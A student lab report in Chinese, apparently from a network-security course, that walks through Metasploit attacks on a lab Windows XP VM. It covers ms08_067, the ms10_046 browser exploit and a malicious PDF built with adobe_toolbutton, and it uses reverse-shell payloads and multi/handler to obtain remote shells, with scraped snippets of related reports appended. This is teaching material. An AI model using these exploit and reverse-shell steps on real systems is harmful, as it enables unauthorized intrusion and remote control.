2. 程式人生 > >Exp5 MSF基礎應用 20154302 薛師凡

Exp5 MSF基礎應用 20154302 薛師凡

阿新 發佈:2018-04-20
運用 局限性 功能 rev 自動 option 計算機 short 解釋

Exp5 MSF基礎應用

20154302 薛師凡

一、基礎問題回答

(1)用自己的話解釋什麽是 exploit , payload , encode.

exploit:

是破除門鎖的工具以及運送間諜的載具,相當於利用漏洞偷偷打開的管道,將做好的木馬病毒等順利傳輸到靶機。

payload:

就是被運送的間諜,到了房子裏頭就可以執行各種間諜活動。簡單來說就是病毒代碼包裝成一個可執行的文件,或者包裝成指定的類型,然後通過管道傳輸進去後開始為我們控制靶機服務。

encode:

是間諜穿的偽裝的衣服,便於間諜潛入目標針對payload進行編碼,就是對它進行包裝打扮,改變payload代碼特征,但是不改變payload為我們所用的特征,但能對payload進行加工。

二、實踐過程

本次試驗共分為四個部分:

  • 1.一個主動攻擊實踐,ms08_067

  • 2.一個針對瀏覽器的攻擊,ms10_046漏洞攻擊

  • 3.一個針對客戶端的攻擊,adobe_toolbutton

  • 4.成功應用任何一個輔助模塊scanner/postscan/tcp
    和gather blowser_info

實驗環境:

攻擊機:kali:192.168.238.131
靶機:Windows:192.168.238.130

2.1主動攻擊:ms08_067

先百度一下ms08_067漏洞的意思
技術分享圖片

參考學長的報告得知英文版XP才可以進行漏洞攻擊
1.首先查看兩個主機的IP地址

2.先msfconsole,再kali主機鍵入search ms08_067 查看漏洞信息
鍵輸入use exploit/windows/smb/ms08_067_netapi,
技術分享圖片

3.然後鍵入show payloads查看需要的payload
技術分享圖片

此處首先從眾地輸入了set payload generic/shell_reverse_tcp選擇病毒模塊

show options查看需要的信息,進行相應設置
技術分享圖片

4.鍵入show targets查看適用的靶機版本,可以set target 0自動選擇
技術分享圖片
技術分享圖片

5.設置好以後輸入exploit進行攻擊。
技術分享圖片

連接不上靶機,攻擊失敗
然後各種失敗
技術分享圖片

然後又互相ping一下,發現WinXP可以ping通kali,但是kali卻ping不通WinXP,
,果斷關閉防火墻,現在可以ping通了。
技術分享圖片

技術分享圖片

再進行攻擊,還是失敗,於是無奈之下選擇了更換病毒模塊。
技術分享圖片

終於成功了!
技術分享圖片
技術分享圖片

2. 對瀏覽器攻擊:ms10_046漏洞攻擊

基本步驟還是和上面一樣,先利用search ms10_046指令查看可以運用的攻擊模塊:
技術分享圖片

用use exploit/windows/browser/ms10_046_shortcut_icon_dllloader使用該模塊,再使用show payloads查看可以供我們使用的payload:
技術分享圖片

然後查看需要設置的參數,SRVHOST填的是本地監聽主機的IP地址,LHOST也是監聽的IP地址,所以這裏SRVHOST和LHOST都應該填攻擊機的IP地址:

set LHOST 192.168.238.131
set SRVHOST 192.168.238.131

使用exploit指令執行漏洞,可以看到生成了一個url,在靶機的IE瀏覽器上使用該url進行訪問,
技術分享圖片

技術分享圖片

又失敗了幾次,
技術分享圖片

技術分享圖片
換了病毒模塊
技術分享圖片

在MSF終端看見漏洞執行成功:

使用sessions指令查看當前存在的會話,可以看到存在一個ID為1的會話:

使用sessions -i 1選擇會話1,成功獲取了靶機的shell,利用systeminfo指令查看靶機的系統信息:
技術分享圖片

3. 對Adobe的漏洞攻擊:adobe_toolbutton

先使用search adobe查詢和adobe漏洞有關的模塊,我選擇的是use exploit/windows/fileformat/adobe_toolbutton,然後使用該模塊,設置回連的payload:
技術分享圖片
技術分享圖片

技術分享圖片

set LHOST 192.168.238.131
set LPORT 4302
set FILENAME 20154302.pdf
設置:
技術分享圖片

設置好相應參數後,開始實施攻擊,發現在/root/.msf4/local/目錄下成功生成了一個lxm.pdf文件:
技術分享圖片

use exploit/multi/handler
set payload generic/shell_reverse_tcp windows/meterpreter/reverse_tcp

然後將該文件傳送到靶機上,並且在攻擊機上打開監聽:
技術分享圖片

將靶機中的pdf文件打開,攻擊機成功獲取到靶機shell:
技術分享圖片

4、輔助模塊應用

輔助模塊真的好多啊

這裏我用了scanner/postscan/tcp模塊
查看其設置的參數
技術分享圖片

設置好之後,掃描
好像是失敗了
技術分享圖片
更改了設置,好像也沒有用
技術分享圖片

我之後換了gather blowser_info,這是一個通過過網站訪問來搜集計算機信息的輔助
技術分享圖片

info查看要設置的參數,設置好,這次成功了,可以看到系統的信息
技術分享圖片

三、實驗體會

本次實驗讓我又一次認識了MSF,功能真的強大,
這次實驗我們的攻擊對象只是XP系統的虛擬機,比較有局限性,隨著網絡攻擊技術的進步,我們更應該學會漏洞的掃描和分析,以及及時的去打好補丁。本次實驗從第一個開始就十分不順利,屢次失敗,通過調試網絡和更換病毒模塊最終取得成功,總體來說還是收獲頗豐,而且還磨練了自己的耐心。

Exp5 MSF基礎應用 20154302 薛師凡

相關推薦

Exp5 MSF基礎應用 20154302

運用 局限性 功能 rev 自動 option 計算機 short 解釋 Exp5 MSF基礎應用 20154302 薛師凡 一、基礎問題回答 (1)用自己的話解釋什麽是 exploit , payload , encode. exploit: 是破除門鎖的工具以及運送間諜

Exp3 免殺原理與實踐20154302

代碼 AR 軟件 可執行文件 別了 模板生成 倒序 即使 get Exp3 免殺原理與實踐20154302薛師凡 一、實踐目標與內容 利用多種工具實現實現惡意代碼免殺 在另一臺電腦上,殺軟開啟的情況下,實現運行後門程序並回連成功。 在保證後門程序功能的情況下實現殺軟共存。

20155205 郝博雅 Exp5 MSF基礎應用

客戶 IT 應用 arc console eve ons 掌握 asp 20155205 郝博雅 Exp5 MSF基礎應用 一、實驗目標 本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成: 1.一個主動攻擊實踐,如ms08_

20154314 王儒君 Exp5 MSF基礎應用

sts att 總結 技術 spa -h attribute bin ons   1. 實踐內容   1.1 一個主動攻擊實踐 MS17_010   ms17_010是一個主動攻擊的exploit   攻擊機:kali 靶機:windows7   攻擊過程:   對於此e

20155232《網絡對抗》Exp5 MSF基礎應用

機構 XP ID 格式 兔子 網段 打印機共享 tcp option 20155232《網絡對抗》Exp5 MSF基礎應用 基礎問題回答 用自己的話解釋什麽是exploit,payload,encode. exploit:就是利用可能存在的漏洞對目標進行攻擊,相當於一個載具

《網絡對抗》Exp5 MSF基礎應用

offic 漏洞 以及 無奈 2.3 auxiliary 去除 win 命令 20155336《網絡對抗》Exp5 MSF基礎應用 一、基礎知識回答 用自己的話解釋什麽是exploit,payload,encode exploit:漏洞利用,與靶機進行交互,攻擊靶機的最

20155318 《網絡攻防》Exp5 MSF基礎應用

我們 時間 olt 反向 ids lis pro exp port 20155318 《網絡攻防》Exp5 MSF基礎應用 基礎問題 用自己的話解釋什麽是exploit,payload,encode? exploit就相當於是載具,將真正要負責攻擊的代碼傳送到靶機中 pa

20155330 《網絡對抗》 Exp5 MSF基礎應用

ref 及其 smb tel 相關 windows服務 實踐 IE coo 20155330 《網絡對抗》 Exp5 MSF基礎應用 實踐過程記錄 Windows服務滲透:MS08_067漏洞攻擊 攻擊機:kali IP地址:192.168.124.132 靶機:wi

20155338 《網絡攻防》Exp5 MSF基礎應用

攻擊機 tap ID 操作 參數設置 mage 圖片 session 生活 20155338 《網絡攻防》Exp5 MSF基礎應用 基礎問題回答 1、 用自己的話解釋什麽是exploit,payload,encode? exploit將真正要負責攻擊的代碼傳送到靶機中,相

20155209 Exp5 MSF基礎應用

HR payload shel 就是 上網 導出 res 屬性 kali Exp5 MSF基礎應用 實驗準備 在實驗之前,上網搜集了很多有關Metasploit滲透測試的資料。對這次實驗影響最大的是一篇最受歡迎的10個Metasploit模塊和插件。排名第一位的是MSB-

20155301 《網絡攻防》 Exp5 MSF基礎應用

shortcut 網絡攻防 自動 flash tar vport 釣魚 基礎 提醒 20155301 《網絡攻防》 Exp5 MSF基礎應用 基礎問題 1.用自己的話解釋什麽是exploit,payload,encode 答:exploit就是利用一些工具的,用來收集目標靶

20155333 《網絡對抗》 Exp5 MSF基礎應用

xpl 10.10 inf disco file 總結 format 成功 反向 20155333 《網絡對抗》 Exp5 MSF基礎應用 基礎問題回答 用自己的話解釋什麽是exploit,payload,encode exploit:攻擊手段,是能使攻擊武器(paylo

Exp5 MSF基礎應用

adobe 查詢 clas 找到 文件 lin inux 技術 一段 Exp5 MSF基礎應用 20155239呂宇軒 基礎問題回答 1、用自己的話解釋什麽是exploit,payload,encode? exploit : Exploit的英文意思就是利用,在做攻擊時,通

20155211 Exp5 MSF基礎應用

服務 地方 .com ner HA window ip地址 IT sfc 20155211 Exp5 MSF基礎應用 基礎問題回答 用自己的話解釋什麽是exploit,payload,encode? exploit:漏洞攻擊。一個exploit程序肯定會觸發系統的一個

2018-2019-2 網絡對抗技術 20165230 Exp5 MSF基礎應用

最大 網絡攻擊 如果 oca load search 返回 meta 字符串 目錄 1.實驗內容 2.基礎問題回答 3.實驗內容 任務一:一個主動攻擊實踐

2018-2019-2 20165312《網絡攻防技術》Exp5 MSF基礎應用

bms olt nal 作用 win7 程序 系統 用戶 .html 2018-2019-2 20165312《網絡攻防技術》Exp5 MSF基礎應用 目錄 一、知識點總結 二、攻擊實例 主動攻擊的實踐 ms08_067 generic/shell_reverse_

2018-2019-2 20165303《網絡攻防技術》Exp5 MSF基礎應用

進行 erp alt 基礎應用 1.2 enc 通道 編碼 技術分享 實踐目標 1.主動攻擊實踐ms17_010以及ms08_067 2.針對瀏覽器的攻擊ms13-008(唯一)以及ms11-050以及ms13-069(唯一) 3.針對客戶端的攻擊adobe (Adobe

2018-2019-2 網絡對抗技術 20165225 Exp5 MSF基礎應用

code 敏感信息 解決 xpl num nco 體會 windows 安全 2018-2019-2 網絡對抗技術 20165225 Exp5 MSF基礎應用 驗前準備 本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成: 一

2018-2019 20165232 Exp5 MSF基礎應用

enc 自己的 失去 rip 工具 ice 選擇 地址 使用 2018-2019 20165232 Exp5 MSF基礎應用 一.原理與實踐說明 1.實踐內容 本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成: 一個主動攻擊實

20165306 Exp5 MSF基礎應用

代碼 發送 ack 配置 -a 3.18 har 方式 編號 Exp5 MSF基礎應用 一、實踐概述 1. 實踐內容 本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。實現: 1.1一個主動攻擊實踐 ms08-067+windows/she